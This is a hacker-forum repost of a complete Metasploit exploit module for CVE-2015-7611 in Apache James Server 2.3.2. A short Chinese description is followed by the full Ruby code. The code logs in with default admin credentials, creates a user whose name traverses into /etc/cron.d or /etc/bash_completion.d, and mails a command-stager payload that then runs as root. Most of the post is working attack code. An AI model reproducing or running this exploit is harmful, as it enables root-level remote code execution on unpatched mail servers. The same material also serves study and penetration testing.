• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Apache James Server 2.3.2不安全的用户创建/任意文件写入漏洞


This Wind

Recommended Posts

发布内容作者:Metasploit                                              漏洞危害等级:critlow_3.gif〔高〕

描述:

此Metasploit模块利用了创建用户时由于缺乏输入验证而导致的漏洞。给定用户的消息存储在用户名部分定义的目录中。通过创建使用目录遍历有效负载作为用户名的用户,可以将命令写入给定目录。若要将此模块与cron开发方法一起使用,请使用给定的有效负载,主机和端口运行该开发。运行漏洞利用程序后,有效负载将在60秒内执行。由于cron在某些Linux操作系统(如Ubuntu)中的运行方式不同,因此最好将目标设置为Bash Completion,因为cron方法可能不起作用。如果目标设置为Bash完成,请在运行漏洞利用程序之前使用给定的有效负载,主机和端口启动侦听器。运行漏洞利用程序后,当用户登录系统时,将执行有效负载。对于这种利用方法,必须启用bash补全功能才能执行代码。这种利用方法会将Apache James邮件对象工件保留在/etc/bash_completion.d目录和恶意用户帐户中。

CVE编号:CVE-2015-7611

##<font></font>
# This module requires Metasploit: https://metasploit.com/download<font></font>
# Current source: https://github.com/rapid7/metasploit-framework<font></font>
##<font></font>
<font></font>
<font></font>
class MetasploitModule < Msf::Exploit::Remote<font></font>
  Rank = NormalRanking<font></font>
<font></font>
  include Msf::Exploit::Remote::Tcp<font></font>
  include Msf::Exploit::CmdStager<font></font>
<font></font>
  def initialize(info={})<font></font>
    super(update_info(info,<font></font>
      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",<font></font>
      'Description'    => %q{<font></font>
        This module exploits a vulnerability that exists due to a lack of input<font></font>
        validation when creating a user. Messages for a given user are stored<font></font>
        in a directory partially defined by the username. By creating a user<font></font>
        with a directory traversal payload as the username, commands can be<font></font>
        written to a given directory. To use this module with the cron<font></font>
        exploitation method, run the exploit using the given payload, host, and<font></font>
        port. After running the exploit, the payload will be executed within 60<font></font>
        seconds. Due to differences in how cron may run in certain Linux<font></font>
        operating systems such as Ubuntu, it may be preferable to set the<font></font>
        target to Bash Completion as the cron method may not work. If the target<font></font>
        is set to Bash completion, start a listener using the given payload,<font></font>
        host, and port before running the exploit. After running the exploit,<font></font>
        the payload will be executed when a user logs into the system. For this<font></font>
        exploitation method, bash completion must be enabled to gain code<font></font>
        execution. This exploitation method will leave an Apache James mail<font></font>
        object artifact in the /etc/bash_completion.d directory and the<font></font>
        malicious user account.<font></font>
      },<font></font>
      'License'        => MSF_LICENSE,<font></font>
      'Author'         => [<font></font>
        'Palaczynski Jakub', # Discovery<font></font>
        'Matthew Aberegg',   # Metasploit<font></font>
        'Michael Burkey'     # Metasploit<font></font>
      ],<font></font>
      'References'     =><font></font>
      [<font></font>
        [ 'CVE', '2015-7611' ],<font></font>
        [ 'EDB', '35513' ],<font></font>
        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]<font></font>
      ],<font></font>
      'Platform'       => 'linux',<font></font>
      'Arch'           => [ ARCH_X86, ARCH_X64 ],<font></font>
      'Targets'        =><font></font>
      [<font></font>
        [ 'Bash Completion', {<font></font>
          'ExploitPath' => 'bash_completion.d',<font></font>
          'ExploitPrepend' => '',<font></font>
          'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }<font></font>
        } ],<font></font>
        [ 'Cron', {<font></font>
          'ExploitPath' => 'cron.d',<font></font>
          'ExploitPrepend' => '* * * * * root ',<font></font>
          'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }<font></font>
        } ]<font></font>
      ],<font></font>
      'Privileged'     => true,<font></font>
      'DisclosureDate' => "Oct 1 2015",<font></font>
      'DefaultTarget'  => 1,<font></font>
      'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]<font></font>
      ))<font></font>
      register_options(<font></font>
        [<font></font>
          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),<font></font>
          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),<font></font>
          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),<font></font>
          OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),<font></font>
          Opt::RPORT(25)<font></font>
        ])<font></font>
    import_target_defaults<font></font>
  end<font></font>
<font></font>
  def check<font></font>
    # SMTP service check<font></font>
    connect<font></font>
    smtp_banner = sock.get_once<font></font>
    disconnect<font></font>
    unless smtp_banner.to_s.include? "JAMES SMTP Server"<font></font>
      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")<font></font>
    end<font></font>
<font></font>
    # James Remote Administration Tool service check<font></font>
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})<font></font>
    admin_banner = sock.get_once<font></font>
    disconnect<font></font>
    unless admin_banner.to_s.include? "JAMES Remote Administration Tool"<font></font>
      return CheckCode::Safe("Target is not JAMES Remote Administration Tool")<font></font>
    end<font></font>
<font></font>
    # Get version number<font></font>
    version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first<font></font>
    # Null check<font></font>
    unless version<font></font>
      return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")<font></font>
    end<font></font>
    # Create version objects<font></font>
    target_version = Gem::Version.new(version)<font></font>
    vulnerable_version = Gem::Version.new("2.3.2")<font></font>
<font></font>
    # Check version number<font></font>
    if target_version > vulnerable_version<font></font>
      return CheckCode::Safe<font></font>
    elsif target_version == vulnerable_version<font></font>
      return CheckCode::Appears<font></font>
    elsif target_version < vulnerable_version<font></font>
      return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")<font></font>
    end<font></font>
  end<font></font>
<font></font>
  def execute_james_admin_tool_command(cmd)<font></font>
    username = datastore['USERNAME']<font></font>
    password = datastore['PASSWORD']<font></font>
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})<font></font>
    sock.get_once<font></font>
    sock.puts(username + "\n")<font></font>
    sock.get_once<font></font>
    sock.puts(password + "\n")<font></font>
    sock.get_once<font></font>
    sock.puts(cmd)<font></font>
    sock.get_once<font></font>
    sock.puts("quit\n")<font></font>
    disconnect<font></font>
  end<font></font>
<font></font>
  def cleanup<font></font>
    return unless target['ExploitPath'] == "cron.d"<font></font>
    # Delete mail objects containing payload from cron.d<font></font>
    username = "../../../../../../../../etc/cron.d"<font></font>
    password = @account_password<font></font>
    begin<font></font>
      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})<font></font>
      sock.get_once<font></font>
      sock.puts("USER #{username}\r\n")<font></font>
      sock.get_once<font></font>
      sock.puts("PASS #{password}\r\n")<font></font>
      sock.get_once<font></font>
      sock.puts("dele 1\r\n")<font></font>
      sock.get_once<font></font>
      sock.puts("quit\r\n")<font></font>
      disconnect<font></font>
    rescue<font></font>
      print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'")<font></font>
    end<font></font>
<font></font>
    # Delete malicious user<font></font>
    delete_user_command = "deluser ../../../../../../../../etc/cron.d\n"<font></font>
    execute_james_admin_tool_command(delete_user_command)<font></font>
  end<font></font>
<font></font>
  def execute_command(cmd, opts = {})<font></font>
    # Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)<font></font>
    exploit_path = target['ExploitPath']<font></font>
    @account_password = Rex::Text.rand_text_alpha(8..12)<font></font>
    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n"<font></font>
    execute_james_admin_tool_command(add_user_command)<font></font>
<font></font>
    # Send payload via SMTP<font></font>
    payload_prepend = target['ExploitPrepend']<font></font>
    connect<font></font>
    sock.puts("ehlo admin@apache.com\r\n")<font></font>
    sock.get_once<font></font>
    sock.puts("mail from: <'@apache.com>\r\n")<font></font>
    sock.get_once<font></font>
    sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n")<font></font>
    sock.get_once<font></font>
    sock.puts("data\r\n")<font></font>
    sock.get_once<font></font>
    sock.puts("From: admin@apache.com\r\n")<font></font>
    sock.puts("\r\n")<font></font>
    sock.puts("'\n")<font></font>
    sock.puts("#{payload_prepend}#{cmd}\n")<font></font>
    sock.puts("\r\n.\r\n")<font></font>
    sock.get_once<font></font>
    sock.puts("quit\r\n")<font></font>
    sock.get_once<font></font>
    disconnect<font></font>
  end<font></font>
<font></font>
  def execute_cmdstager_end(opts)<font></font>
    if target['ExploitPath'] == "cron.d"<font></font>
      print_status("Waiting for cron to execute payload...")<font></font>
    else<font></font>
      print_status("Payload will be triggered when someone logs onto the target")<font></font>
      print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")<font></font>
      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")<font></font>
    end<font></font>
  end<font></font>
<font></font>
  def exploit<font></font>
    execute_cmdstager(background: true)<font></font>
  end<font></font>
<font></font>
end<font></font>
<font></font>

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now